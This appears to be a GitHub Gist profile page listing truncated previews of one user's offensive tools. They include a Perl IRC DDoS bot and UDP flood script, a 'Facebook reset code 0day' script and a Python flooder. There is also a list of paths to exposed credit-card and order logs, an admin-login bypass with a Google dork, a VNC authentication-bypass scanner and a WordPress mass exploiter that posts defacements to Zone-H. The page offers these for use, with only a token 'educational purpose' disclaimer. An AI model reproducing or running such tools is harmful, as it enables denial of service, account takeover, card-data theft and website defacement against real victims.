Skip to content

Instantly share code, notes, and snippets.

View dreadpiratesr's full-sized avatar

niño orsino dreadpiratesr

View GitHub Profile
@dreadpiratesr
dreadpiratesr / DDoS bot
Created October 13, 2015 20:24
Undernet DDoS bot
#!/usr/bin/perl
######################################################################################################################
######################################################################################################################
## DDoS Perl IrcBot v1.0 / 2015 by Orsineante Security Team ## [ Help ] ###########################################
## Stealth MultiFunctional IrcBot writen in Perl #######################################################
## Teste on every system with PERL instlled ## !u @system ##
## ## !u @version ##
## This is a free program used on your own risk. ## !u @channel ##
## Created for educational purpose only. ## !u @flood ##
@dreadpiratesr
dreadpiratesr / (DDoS)
Created October 13, 2015 20:26
Perl Flood Script (DDoS)
[Save file as reckz.pl, Put it in Perl/Bin]
#!/usr/bin/perl START SCRIPT
use Socket;
use strict;
if ($#ARGV != 3) {
print "reckz.pl <ip> <port> <size> <time>\n\n";
print " port=0: use random ports\n";
@dreadpiratesr
dreadpiratesr / [PYTHON]
Last active April 8, 2022 03:23
Facebook Reset Code 0day Python Version
#Facebook Reset Code 0day Python Version
#If you want to edit this script you are free i don't give a fuck cause it tooks 2 minutes to write xD \!/
#As a temporarily solution, use requesocks Module
#How to install?
#with pip : pip install requesocks
#with easy_install : easy_install requesocks
import urllib2 ,sys ,re
import os
import ssl

Keybase proof

I hereby claim:

  • I am dreadpiratesr on github.
  • I am dreadpiratesr (https://keybase.io/dreadpiratesr) on keybase.
  • I have a public key whose fingerprint is 3A74 1C92 2992 DC81 5C77 0E45 5C83 1AF6 AE26 CC2C

To claim this, I am signing this object:

import socket
import random
import os, sys
import threading
if sys.platform == 'linux' or sys.platform == 'linux2':
clearing = ' clear'
else:
clearing = 'cls'
os.system(clearing)
/cgi-bin/DCShop/Orders/orders.txt
/vpasp/shopdbtest.asp
/orders/checks.txt
/WebShop/logs
/ccbill/secure/ccbill.log /scripts/cart32.exe
/cvv2.txt
/cart/shopdbtest.asp
/cgi-win/cart.pl
/shopdbtest.asp
/WebShop/logs/cc.txt /cgi-local/cart.pl
Exploit Title: Supercon Direct login to admin panel without entering password
Google Dork : inurl:/webadmin/login.php intext:“Supercon Infoservices”
Product Description
——————-
Supercon delivers high quality, reliable and cost-effective IT services to customers globally.
We provide world-class technology services by constantly exploring and implementing innovative
solutions that drive long-term value to our customers. We have been providing solutions to clients
across the globe for more than 5 years and boast of our extensive
experience on website designing and development projects.
#!/usr/bin/perl
# Scanner VNC - OpenVNC 4.11 authentication bypass By GhOsTrIaX
use strict;
use warnings;
use IO::Socket;
use threads;
use threads::shared;
use Errno qw(EAGAIN);
#!/usr/bin/perl
use LWP::UserAgent;
use LWP::Simple;
use strict;
use warnings;
use threads;
use threads::shared;
use Config;
use HTML::TreeBuilder;
#!/usr/bin/perl
# Themes Mass Exploiter Wordpress & Auto Post Zone-h
# Upload File and Submit your defacements on Zone-H
# TEAM : dreadpiratesr
# https://twitter.com/blackmarketi2p
# Author : dpr
# USAGE => perl bt.pl
use HTTP::Request;
use LWP::Simple;